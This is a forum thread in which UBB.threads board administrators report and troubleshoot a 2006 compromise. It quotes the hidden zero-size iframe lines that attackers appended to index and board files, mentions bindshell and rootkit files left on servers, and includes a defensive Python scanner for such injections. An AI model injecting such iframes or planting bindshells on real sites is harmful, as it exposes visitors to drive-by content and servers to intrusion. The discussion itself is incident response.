M (stranger, Joined: Jun 2006, Posts: 23):
Last night my board (running 6.5.2) got hacked and I can't figure out how.
At the end of all index.php, index.html files and ubbthreads.php there were the following two lines added:

<html><iframe src=http://neoffic.com/t/?id=soauker width=0 Sheight=0 frameborder=0 Sscrolling=no></iframe></html>
<html><iframe src=http://neoffic.com/t/?id=soauker width=0 Sheight=0 frameborder=0 Sscrolling=no></iframe></html>

Some users complained about popups and slow pages and that is how I found out that my board is compromised.

Actually, since I run many other virtual servers on the same server, all their index files were modified as well. So I think this guy has spent lots of time to find them (I have about 80 gigs of data in zillion files). The modified time was identical on all compromised files.

Did anyone have similar issue? I googled it and it appears that other ubbthreads boards were target of this attack as well.

My board is under heavy traffic and it is next to impossible to analyze the webserver logs.

Any idea how to patch ubbthreads against such attacks?
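A defensive check for the symptom described in this post, added here as an example and not code from the thread or from UBB.threads: walk a web root holding many virtual hosts, find index.php / index.html / ubbthreads.php files whose tail carries a zero-size iframe, and cluster the hits by modification time, since the post notes every tampered file shared one mtime. The sample tree, the placeholder host in the payload and the timestamp are constructed for the demo.

```python
import os
import re
import tempfile
from collections import defaultdict

# Names the post reports as tampered; a hidden (zero-size) iframe was appended to each.
TARGET_NAMES = {"index.php", "index.html", "ubbthreads.php"}
HIDDEN_IFRAME = re.compile(rb"<iframe[^>]*\b(?:width|height)=[\"']?0\b", re.IGNORECASE)

# Constructed payload modelled on the appended line; host and id are placeholders.
INJECTED = (b"<html><iframe src=http://example.invalid/t/?id=PLACEHOLDER width=0 height=0 "
            b"frameborder=0 scrolling=no></iframe></html>\n")


def scan_tree(root, tail_bytes=4096):
    """Return {path: mtime} for target files whose last tail_bytes hold a hidden iframe."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower() not in TARGET_NAMES:
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                fh.seek(0, os.SEEK_END)
                fh.seek(max(0, fh.tell() - tail_bytes))  # only the appended tail matters
                if HIDDEN_IFRAME.search(fh.read()):
                    hits[path] = int(os.stat(path).st_mtime)
    return hits


def group_by_mtime(hits):
    """Cluster hits by mtime; one large cluster points to a single scripted defacement run."""
    groups = defaultdict(list)
    for path, mtime in hits.items():
        groups[mtime].append(path)
    return dict(groups)


def build_sample_tree():
    """Constructed web root: vhost site-a is clean, site-b has two files tampered at one instant."""
    root = tempfile.mkdtemp(prefix="vhosts_")
    os.makedirs(os.path.join(root, "site-a"))
    with open(os.path.join(root, "site-a", "index.php"), "wb") as fh:
        fh.write(b"<?php require 'ubbthreads.php'; ?>\n")
    os.makedirs(os.path.join(root, "site-b"))
    stamp = 1160000000  # constructed epoch mtime shared by the tampered files
    for name in ("index.php", "ubbthreads.php"):
        path = os.path.join(root, "site-b", name)
        with open(path, "wb") as fh:
            fh.write(b"<?php /* board code */ ?>\n" + INJECTED)
        os.utime(path, (stamp, stamp))
    return root


def demo():
    """Scan the constructed tree; returns {mtime: sorted basenames} of suspicious files."""
    groups = group_by_mtime(scan_tree(build_sample_tree()))
    return {m: sorted(os.path.basename(p) for p in paths) for m, paths in groups.items()}
```

Run `demo()` to see the tampered site-b files reported under their shared timestamp while the clean site-a copy is ignored; point `scan_tree()` at a real document root to do the same on a live server.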

M (stranger, Joined: Jun 2006, Posts: 23):
Well, I've just noticed another hacked board of a user of these forums - http://threadsdev.net

Poor fella has 4 iframes that almost locked out my computer. I had only 2.

I think this evil genius is finding his targets using Google. Maybe a simple filename renaming of the key files like ubbthreads.php could help for now?

R (Former Developer, Joined: Jun 2006, Posts: 9,242, Likes: 1):
Check this thread:

https://www.ubbcentral.com/boards/showflat.php/Cat/0/Number/4560063

There is a fix for the security hole that is being used.

M (stranger, Joined: Jun 2006, Posts: 23):
Thanks! I have just stumbled on it as well.

F (member, Joined: Apr 2006, Posts: 116):
I followed the neoffic link and it took me to http://www.ixwebhosting.com/

Here is the chat session with one of their operators:

Chat Information: Please wait for a site operator to respond.
Chat Information: You are now chatting with 'Satish Manem'
Satish Manem: Hello, how may I help you today?
you: Do you know anything about recent Hack Attack on UBB boards?
Satish Manem: I've read that last week was the worst in the history of hacking for hack attacks, and the target is Windows.
Satish Manem:
you: Well I have got the address of your website from the data that was left behind by hackers
you: how can you explain this?
Satish Manem: Do you mean we involve in hacking ?
you: I don't know, are you?
Satish Manem: I am sorry, we are hosting services providers.
Satish Manem: We just provide the hosting space for the domains.
you: I can see that, but your information now is pasted all over the hacked BBSes, why?
Satish Manem: I have no idea about that.
you: Am I the first person to tell you this?
Satish Manem: Yes
you: Hahaha you are full of [censored]
you: Are you not going to respond to this?
Satish Manem: Let me know if you have any other queries regarding hosting ?
you: Why should I you already look dodgy, and now you lie through your teeth, why would I be interested in your hosting?

that was it, sorry :)

enthusiast (Joined: Jun 2006, Posts: 742):
I had 5 hacked Threads boards today myself. Thanks for the fix!!


Joshua Pettit
Web Developer
www.ThreadsDev.net | www.JoshuaPettit.com
Ian (Carpal Tunnel, Joined: Jun 2006, Posts: 3,837):
Thanks - I think we escaped - but are now patched :)

enthusiast (Joined: Jun 2006, Posts: 742):
I had to patch just over 50 installs at VertexHost.com and uncompromise a couple of servers.


Ian (Carpal Tunnel, Joined: Jun 2006, Posts: 3,837):
I can find no evidence of it on any of our servers - mind you I have had enough hacking attempts recently to last a lifetime LOL

D (stranger, Joined: May 2006, Posts: 5):
We also had this problem and I'm glad to see it wasn't just us. My sys admin said that the modification required root access. Does this sound consistent or plausible?

R (Former Developer, Joined: Jun 2006, Posts: 9,242, Likes: 1):
Hi David. Was your sysadmin saying that the hacker required root access? If that's the case, then no. It allowed them access to anything the webserver could write to. At that point on some servers they uploaded a pwned or bindz script that could be started. I still haven't been able to get my hands on either of these scripts to see what they actually do.

F (member, Joined: Apr 2006, Posts: 116):
Why don't you post them here so we all can have a look?

M (stranger, Joined: Jun 2006, Posts: 23):
I have followed hacker's links and downloaded bindz plus the tools he used. They are, I must say, pretty good. Let me know if you want to see them and will send you the link. (Don't want to post them here because... well you know why.)

H (newbie, Joined: May 2004, Posts: 38):
I also was hacked.. and yesterday I applied the patch that was listed here.. https://www.ubbcentral.com/boards/showflat.php/Cat/0/Number/4560078/

However I was hacked again after those two patches were applied... If I go to the admin panel and close my forums can I still be hacked..

And is there other forum software that is less vulnerable than what infopop has produced..

R (Former Developer, Joined: Jun 2006, Posts: 9,242, Likes: 1):
You'll probably want to grab 6.5.4. It's possible that the one script that was found to be potentially vulnerable was used. It's also very possible that there were backdoors left from the original hack. Usually if someone gets in, they will always try and leave themselves a backdoor. Do you have access to your server error logs? If so, you can look there to see any unusual requests for clues.

As for less vulnerable software. Unfortunately this seems to happen to just about all of them from time to time. Do a quick scan of google and you'll see there's been security releases of this nature put out for just about all the major products. If there is a hole anywhere it will be found. It would be best if the hole was never there, but unfortunately it was and the only thing we can do is get a fix out promptly, which we did.

Steps are being taken in the way version 7 has been developed to help in the security area. We've been doing this long enough now that we know what the common oversights are that usually cause these problems and will be doing everything we can to prevent them in the future.

H (newbie, Joined: May 2004, Posts: 38):
Rick, I have submitted a support ticket to get the security patches up thru version 6.5.4

R (Former Developer, Joined: Jun 2006, Posts: 9,242, Likes: 1):
Great, I'll go and get you the fix.

F (member, Joined: Apr 2006, Posts: 116):
Rick, what does register_globals do? Is it like use strict in perl? I would like to know just in case I have to fix other scripts that don't like it.

F (member, Joined: Apr 2006, Posts: 116):
Ah, ok, I googled for it and

"...From PHP 4.2 onwards, the default behaviour of PHP is to have register_globals set to off..."

R (Former Developer, Joined: Jun 2006, Posts: 9,242, Likes: 1):
It is default to off, but you'll still find it set to On quite often. It's a good idea to check and see what the setting is for your install just in case.

T (stranger, Joined: Oct 2006, Posts: 12):
I have the following error when I apply the fix and perform the upgrade:

"The following files are reporting a wrong version:"

all changed files are then listed despite the fact that I have uploaded the latest files (version 6.5.4) onto my server.

Is something preventing me from applying the fix?

R (Former Developer, Joined: Jun 2006, Posts: 9,242, Likes: 1):
Hi Thwala. Try looking at the comment section (first 10-15 lines) of one of the changed files that you uploaded. Make sure that they say # File Version 6.5.4 in that section.

If they all have that, then we can do a manual upgrade for you. Really it's just a matter of uploading the changed files and then running one db command.

D (stranger, Joined: May 2006, Posts: 5):
Rick,

After speaking with my sysadmin in more detail he is pretty sure that root access was obtained via the blindz script. If you want to talk to him directly I would be happy to send his contact info along.

> Hi David. Was your sysadmin saying that the hacker required root access? If that's the case, then no. It allowed them access to anything the webserver could write to. At that point on some servers they uploaded a pwned or bindz script that could be started. I still haven't been able to get my hands on either of these scripts to see what they actually do.

Addict (Joined: Aug 2004, Posts: 460):
Rick, for the 6.5.4 upgrade that you mentioned, is there a short list of the lines of code that should be added just like for 6.5.3 where you mentioned two files and what needs to be changed within them?

For instance in showflat is define('SHOWPOST',1); the only thing that needs to be added? Is it also ok to do this for 6.5.2 or 6.5.1?

R (Former Developer, Joined: Jun 2006, Posts: 9,242, Likes: 1):
Unfortunately there's not a list, for the most part it's the same type of quick fixes. I've kept this information off the public forums so as not to provide any info to potential troublemakers until everyone can upgrade. If you need the exact changes, just open up a support ticket and I can give you more info.

Addict (Joined: Aug 2004, Posts: 460):
Thanks man, Josh sent me the exact changes via a PM on threadsdev.net.

I noticed a strange file in my threads folder: bindtty

I downloaded it and erased it straight away but have no idea whether it was just uploaded by someone or whether it was part of the file restore that I ran on my server. Hmmm...

Will the file come in handy, does someone want to take a look at it? Can any information be gained from it?

Old Hand (Joined: Jun 2006, Posts: 956):
"I suspect bindtty is just a bindshell that opens port 5299 and allows people to connect to your server as whatever user the program is run as..

if it's in an ikonboard dir I expect they've hacked you via some insecure script and got in as your httpd uid. might be worth doing a further search around your system to see if they've done anything else"

found with Google.


my board: http://www.dragonclan-forum.de
my hobby: http://www.biker-reise.de
I can help with questions about UBBthreads in German, or at least try to.
UBB.threads Developer (Joined: Jun 2006, Posts: 16,292, Likes: 116):
bindtty is, in most cases, a malicious script; if you did not put it there, it is not bundled with any infopop product (to my knowledge).


I am a Web Development Contractor, I do not work for UBBCentral. I have provided free User to User Support since the beginning of these support forums.
Do you need Forum Install or Upgrade Services?
Forums: A Gardeners Forum, Scouters World
UBB.threads: UBBWiki, UBB Styles, UBB.Sitemaps
Longtime Supporter & Resident Post-A-Holic
VNC Web Services: Code Modifications, Upgrades, Styling, Coding Services, Disaster Recovery, and more!
Addict (Joined: Aug 2004, Posts: 460):
I know that someone put it there without my knowledge. No doubt about it.

But can we find anything out about the people responsible by analysing the file?

Old Hand (Joined: Jun 2006, Posts: 956):
It's a generic file, just google for it, you will find many sources. It's part of a rootkit. You have to analyse your server log files to find out where it comes from. I guess it comes from Brasilia ....

You can do nothing.

Erase this file, check the server for any kind of rootkit, don't allow the execution of scripts from the /tmp folder, apply any php patch (5.1.4 is current), turn globals off and check any script running on your server for updates.

There are many scripts out there with security holes. I found a gallery script on my server with possible XSS holes. Threads closed many holes and I continue my checks.

Watch your server error log file frequently.


Addict (Joined: Aug 2004, Posts: 460):
> don't allow the execution of scripts from the /tmp folder

How does wiping the folder clean sound?

I just chucked out all this stats mumbo jumbo and emptied the entire folder. Does that help? :)

Just out of curiosity, is it still true that no Threads board has been hacked with the globals turned off?

Pooh-Bah (Joined: Jul 2006, Posts: 2,143):
> How does wiping the folder clean sound?

Doesn't mean something won't be put in there 5 minutes from now. Your server is supposed to use /tmp. It's temporary workspace. What you want to do though, is ensure that things put in there can't be used improperly. Removing script execution goes a long way toward achieving that.


Addict (Joined: Aug 2004, Posts: 460):
Hi Dave, do you mean changing the permissions for the folder, or also for files inside it?

The folder is set to 700. Should I also disable the "execute" attribute for the owner and make it 600?

old hand (Joined: Jun 2006, Posts: 869):
I turned off the globals, as per code given a week ago or so.

Got hacked day before yesterday

<html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=soauker marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>

Makes me wonder if they got our domain address by coming here...


http://clubadventist.com/forums

No longer following the carrot
old hand (Joined: Jun 2006, Posts: 869):
I am eager to try the alpha or beta 7.0 version.

Old Hand (Joined: Jun 2006, Posts: 956):
As I see, you use 6.5.1.1.
Get 6.5.4 or open a ticket to get information for another fix. There is still another hole in the system that can be used to hack your forum.
Or did you apply the 2 fixes and get hacked again?


Ian (Carpal Tunnel, Joined: Jun 2006, Posts: 3,837):
> I turned off the globals, as per code given a week ago or so.
>
> Got hacked day before yesterday
>
> <html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=soauker marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
>
> Makes me wonder if they got our domain address by coming here...

More likely just via google or similar.

P (stranger, Joined: May 2004, Posts: 6):
I found this guy

soauker@gmail.com he hacked my site today and admitted doing it. I tried to get Google to give up his details. They told me to go !#@ myself.

This guy soauker is a member of a cyber hacker group and has actually even reported a few php vulnerabilities in phpnuke in the past.

His gig is to run up the CPM impressions on some banners that someone is paying him to run. I'd pay him to leave my site alone.. Yeah either that or burn his house down and sow salt on the land so that nothing would ever grow there again.

old hand (Joined: Jun 2006, Posts: 869):
One of our members did a "go back" click and it showed which domains it is clicking on; this may be useful:
http://clubadventist.com/clickback.png


F (member, Joined: Apr 2006, Posts: 116):
You guys are still using Internet Explorer? Then you have no right to complain about security! ;)
